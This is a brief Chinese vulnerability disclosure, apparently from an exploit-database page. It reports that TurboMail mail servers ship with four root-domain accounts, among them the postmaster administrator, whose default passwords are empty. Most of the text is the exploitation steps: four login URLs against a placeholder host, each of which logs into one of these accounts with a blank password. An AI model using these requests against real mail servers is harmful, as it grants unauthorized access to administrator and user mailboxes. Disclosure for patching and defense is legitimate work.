<p>TurboMail邮箱系统安装后 默认会有4个root域的账号,管理员及三个普通账号:</p><p>postmaster管理员</p><p>nobody</p><p>sec_bm</p><p>sec_sj</p><p>默认密码为空</p><p><br></p><p>漏洞利用过程</p><p><a href="http://xxx.com/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise">http://xxx.com/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise</a></p><p><a href="http://xxx.com/mailmain?type=login&uid=" rel="nofollow">http://xxx.com/mailmain?type=login&uid=</a> postmaster&pwd=&domain=root&style=enterprise</p><p><a href="http://xxx.com/mailmain?type=login&uid=" rel="nofollow">http://xxx.com/mailmain?type=login&uid=</a> nobody&pwd=&domain=root&style=enterprise</p><p> </p><p><a href="http://xxx.com/mailmain?type=login&uid=" rel="nofollow">http://xxx.com/mailmain?type=login&uid=</a> sec_sj&pwd=&domain=root&style=enterprise</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434694348734-1.png" data-image-size="865,478"><br></p>
暂无评论